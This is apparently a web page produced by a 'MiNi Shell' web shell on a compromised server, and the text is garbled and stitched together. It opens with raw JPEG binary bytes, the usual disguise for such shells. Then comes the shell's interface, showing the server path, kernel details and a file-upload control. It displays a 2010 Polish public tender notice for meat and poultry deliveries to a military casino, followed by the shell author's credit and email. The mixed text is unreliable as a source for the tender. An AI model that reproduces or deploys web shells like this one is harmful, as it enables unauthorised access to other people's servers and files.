JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100426/97623-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa mięsa i wędlin dla Kasyna Wojskowego Nr 20 przy Jednostce Wojskowej 2414. Nr postępowania 07/2010/PN</b><br>
<b>Numer ogłoszenia: 97623 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasyno Wojskowe Nr 20 przy Jednostce Wojskowej 2414 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 0-22 6 847 259, 6 847 452, faks 0-22 846 81 89.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wędlin dla Kasyna Wojskowego Nr 20 przy Jednostce Wojskowej 2414. Nr postępowania 07/2010/PN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa surowego mięsa, wędlin oraz surowych podrobów wieprzowo - wołowych (część I zamówienia)


1.	SCHAB ŚRODKOWY WIEPRZOWY b/k		700 kg
2	SZYNKA WIEPRZOWA b/k		80 kg
3.	ŁOPATKAWIEPRZOWA b/k		300 kg
4.	KARKÓWKA WIEPRZOWA b/k		400 kg 
5.	POLĘDWICZKI WIEPRZOWE		120 kg
6.	GOLONKA PRZEDNIA WIEPRZOWA Z KOŚCIĄ 		200 kg
7.	WĄTROBA WIEPRZOWA		100 kg
8.	NOGI WIEPRZOWE		60 kg
9.	OZORY WIEPRZOWE		50 kg
10.	PŁUCA WIEPRZOWE		50 kg
11.	SERCA WIEPRZOWE		40 kg
12.	BOCZEK WIEPRZOWY  b/żeber		200 kg
13.	ŻEBERKA WIEPRZOWE PASKI		150 kg
14.	PODGARDLE WIEPRZOWE ZE SKÓRĄ		60 kg
15.	SŁONINA ŚWIEŻA b/skóry		80 kg
16.	SMALEC b/dodatków 		130 kg
17.	UDZIEC WOŁOWY b/k 		500 kg
18.	POLĘDWICA WOŁOWA (MIĘSO)		10 kg
19.	ANTRYKOT WOŁOWY z kością 		200 kg
20.	SZPONDER WOŁOWY z kością		300 kg
21.	FLAKI WOŁOWE (PÓŁFABRYKAT) 		150 kg
22.	BOCZEK WĘDZONY b/żeber		290 kg
23.	PRĘGA WOŁOWA BEZ KOŚCI 		40 kg
24.	KOŚCI KARKOWE SUROWE		100 kg
25.	SZYNKA WĘDZONA GOTOWANA 		250 kg
26.	BALERON GOTOWANY		70 kg
27.	POLĘDWICA  SOPOCKA		70 kg
28.	SZYNKA KONSERWOWA		50 kg
29.	KIEŁBASA ŻYWIECKA		40 kg
30.	KIEŁBASA SUCHA ŻYWIECKA		50 kg
31.	KIEŁBASA SUCHA KRAKOWSKA 		40 kg
32.	KIEŁBASA KRAKOWSKA		50 kg
33.	KIEŁBASA STAROPOLSKA (CIENKA)		60 kg
34.	KIEŁBASA SZYNKOWA WIEPRZOWA		40 kg
35.	KIEŁBASA  ZWYCZAJNA		50 kg
36.	KIEŁBASA WIEJSKA		100 kg
37.	KIEŁBASA PODWAWELSKA		300 kg
38.	KIEŁBASA BIAŁA SUROWA		60 kg
39.	PARÓWKI WIEPRZOWE 		100 kg
40.	KABANOSY WIEPRZOWE		60 kg
41.	KASZANKA GRYCZANA (CIENKA)		80 kg
42.	KASZANKA Z PODROBAMI (CIENKA) 		60 kg
43.	PASZTETOWA WIEPRZOWA		30 kg
44.	SALCESON WŁOSKI		40 kg
45.	SALCESON WIEJSKI		50 kg
46.	BEKON WĘDZONY		20 kg
47.	KIEŁBASA BIAŁA PARZONA		60 kg
48.	KIEŁBASA GRILOWA		30 kg
49.	KIEŁBASA  MORTADELA		20 kg
50.	KIEŁBASA  MYŚLIWSKA SUCHA		20 kg
51.	KIEŁBASA PARÓWKOWA 		40 kg
52.	PASZTET MIĘSNY WIEPRZOWY		20 kg
53.	SALAMI  DĘBICKIE		40 kg
54.	KIEŁBASA WIEJSKA PODSUSZANA		40 kg
55.	OGONÓWKA WĘDZONA 		30 kg
56.	MIELONKA TYROLSKA 		20 kg
57.	SZYNKA WĘDZONA CHŁOPSKA		40 kg
58.	POLEDWICA WĘDZONA ŁOSOSIOWA		20 kg
59.	WĘDZONKA KROTOSZYŃSKA		30 kg

Dostawa surowego mięsa, wędlin oraz surowych podrobów drobiowych (część II)
1.	KURCZAK (TUSZKA) 		400 kg
2	UDKA Z KURCZAKA 		300 kg
3.	UDKA Z KURCZAKA PAŁKI 		60 kg
4.	FILET Z KURCZAKA		880 kg
5.	SKRZYDEŁKA Z KURCZAKA		50 kg
6.	WĄTROBA Z KURCZAKA		100 kg
7.	FILET Z INDYKA		750 kg
8.	FILET Z KACZKI		200 kg
9.	MIĘSO GULASZOWE Z KURCZAKA BEZ SKÓRY		300 kg
10.	UDZIEC Z INDYKA		30 kg
11.	KACZKA (TUSZKA)		60 kg
12.	ŻOŁĄDKI Z KURCZAKA		30 kg
13.	KORPUSY KURCZAKA		40 kg
14.	SKRZYDŁA INDYCZE		20 kg
15.	SZYNKA Z INDYKA		20 kg
16.	POLĘDWICA Z INDYKA		20 kg
17.	GOLONKA Z INDYKA		30 kg
18.	PIERSI WĘDZONE KURCZAKA		10 kg
19.	PIERSI WĘDZONE INDYKA		10 kg
Podane przez Zamawiającego nazwy (znaki towarowe) zamawianego asortymentu mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu zamawianego asortymentu, przy czym zamawiający dopuszcza składanie ofert równoważnych.
Wykonawca obowiązany jest wskazać (tabela Formularz cenowy) typ - nazwę oferowanej pozycji asortymentu równoważnego. Brak wskazania typu - nazwy produktu równoważnego, oznacza zaakceptowanie przez Wykonawcę rozwiązań wzorcowych, jeżeli takie były wskazane w SIWZ.
W celu potwierdzenia, że oferowane przez Wykonawcę dostawy produktów równoważnych odpowiadają wymaganiom określonym w SIWZ należy dołączyć do oferty materiałów informacyjnych dla zamiennika, potwierdzających równoważność między zamiennikiem i wzorcem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują potencjałem technicznym tj.: dysponują co najmniej 1 środkiem transportu spełniającym wymagania sanitarne określonych ustawą z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006r. Nr 171, poz. 1225 z późn. zm.)
[Sposób oceny spełniania warunków] Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli będzie to wynikało z oświadczeń o których mowa w rozdziale VI siwz złożonych wraz z ofertą. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie podmiotów, o których mowa w art. 26 ust. 2 b ustawy  - jeżeli Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jw2414.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego - ul. Żwirki i Wigury 9/13, Warszawa, budynek administracyjno - biurowy, w dni robocze w godzinach od 10.00 do 14.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 12:00, miejsce: W siedzibie zamawiającego - ul. Żwirki i Wigury 9/13, Warszawa, budynek administracyjno - biurowy, w dni robocze w godzinach od 10.00 do 14.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa surowego mięsa, wędlin oraz surowych podrobów wieprzowo - wołowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SCHAB ŚRODKOWY WIEPRZOWY b/k		700 kg
2	SZYNKA WIEPRZOWA b/k		80 kg
3.	ŁOPATKAWIEPRZOWA b/k		300 kg
4.	KARKÓWKA WIEPRZOWA b/k		400 kg 
5.	POLĘDWICZKI WIEPRZOWE		120 kg
6.	GOLONKA PRZEDNIA WIEPRZOWA Z KOŚCIĄ 		200 kg
7.	WĄTROBA WIEPRZOWA		100 kg
8.	NOGI WIEPRZOWE		60 kg
9.	OZORY WIEPRZOWE		50 kg
10.	PŁUCA WIEPRZOWE		50 kg
11.	SERCA WIEPRZOWE		40 kg
12.	BOCZEK WIEPRZOWY  b/żeber		200 kg
13.	ŻEBERKA WIEPRZOWE PASKI		150 kg
14.	PODGARDLE WIEPRZOWE ZE SKÓRĄ		60 kg
15.	SŁONINA ŚWIEŻA b/skóry		80 kg
16.	SMALEC b/dodatków 		130 kg
17.	UDZIEC WOŁOWY b/k 		500 kg
18.	POLĘDWICA WOŁOWA (MIĘSO)		10 kg
19.	ANTRYKOT WOŁOWY z kością 		200 kg
20.	SZPONDER WOŁOWY z kością		300 kg
21.	FLAKI WOŁOWE (PÓŁFABRYKAT) 		150 kg
22.	BOCZEK WĘDZONY b/żeber		290 kg
23.	PRĘGA WOŁOWA BEZ KOŚCI 		40 kg
24.	KOŚCI KARKOWE SUROWE		100 kg
25.	SZYNKA WĘDZONA GOTOWANA 		250 kg
26.	BALERON GOTOWANY		70 kg
27.	POLĘDWICA  SOPOCKA		70 kg
28.	SZYNKA KONSERWOWA		50 kg
29.	KIEŁBASA ŻYWIECKA		40 kg
30.	KIEŁBASA SUCHA ŻYWIECKA		50 kg
31.	KIEŁBASA SUCHA KRAKOWSKA 		40 kg
32.	KIEŁBASA KRAKOWSKA		50 kg
33.	KIEŁBASA STAROPOLSKA (CIENKA)		60 kg
34.	KIEŁBASA SZYNKOWA WIEPRZOWA		40 kg
35.	KIEŁBASA  ZWYCZAJNA		50 kg
36.	KIEŁBASA WIEJSKA		100 kg
37.	KIEŁBASA PODWAWELSKA		300 kg
38.	KIEŁBASA BIAŁA SUROWA		60 kg
39.	PARÓWKI WIEPRZOWE 		100 kg
40.	KABANOSY WIEPRZOWE		60 kg
41.	KASZANKA GRYCZANA (CIENKA)		80 kg
42.	KASZANKA Z PODROBAMI (CIENKA) 		60 kg
43.	PASZTETOWA WIEPRZOWA		30 kg
44.	SALCESON WŁOSKI		40 kg
45.	SALCESON WIEJSKI		50 kg
46.	BEKON WĘDZONY		20 kg
47.	KIEŁBASA BIAŁA PARZONA		60 kg
48.	KIEŁBASA GRILOWA		30 kg
49.	KIEŁBASA  MORTADELA		20 kg
50.	KIEŁBASA  MYŚLIWSKA SUCHA		20 kg
51.	KIEŁBASA PARÓWKOWA 		40 kg
52.	PASZTET MIĘSNY WIEPRZOWY		20 kg
53.	SALAMI  DĘBICKIE		40 kg
54.	KIEŁBASA WIEJSKA PODSUSZANA		40 kg
55.	OGONÓWKA WĘDZONA 		30 kg
56.	MIELONKA TYROLSKA 		20 kg
57.	SZYNKA WĘDZONA CHŁOPSKA		40 kg
58.	POLEDWICA WĘDZONA ŁOSOSIOWA		20 kg
59.	WĘDZONKA KROTOSZYŃSKA		30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa surowego mięsa, wędlin oraz surowych podrobów drobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	KURCZAK (TUSZKA) 		400 kg
2	UDKA Z KURCZAKA 		300 kg
3.	UDKA Z KURCZAKA PAŁKI 		60 kg
4.	FILET Z KURCZAKA		880 kg
5.	SKRZYDEŁKA Z KURCZAKA		50 kg
6.	WĄTROBA Z KURCZAKA		100 kg
7.	FILET Z INDYKA		750 kg
8.	FILET Z KACZKI		200 kg
9.	MIĘSO GULASZOWE Z KURCZAKA BEZ SKÓRY		300 kg
10.	UDZIEC Z INDYKA		30 kg
11.	KACZKA (TUSZKA)		60 kg
12.	ŻOŁĄDKI Z KURCZAKA		30 kg
13.	KORPUSY KURCZAKA		40 kg
14.	SKRZYDŁA INDYCZE		20 kg
15.	SZYNKA Z INDYKA		20 kg
16.	POLĘDWICA Z INDYKA		20 kg
17.	GOLONKA Z INDYKA		30 kg
18.	PIERSI WĘDZONE KURCZAKA		10 kg
19.	PIERSI WĘDZONE INDYKA		10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com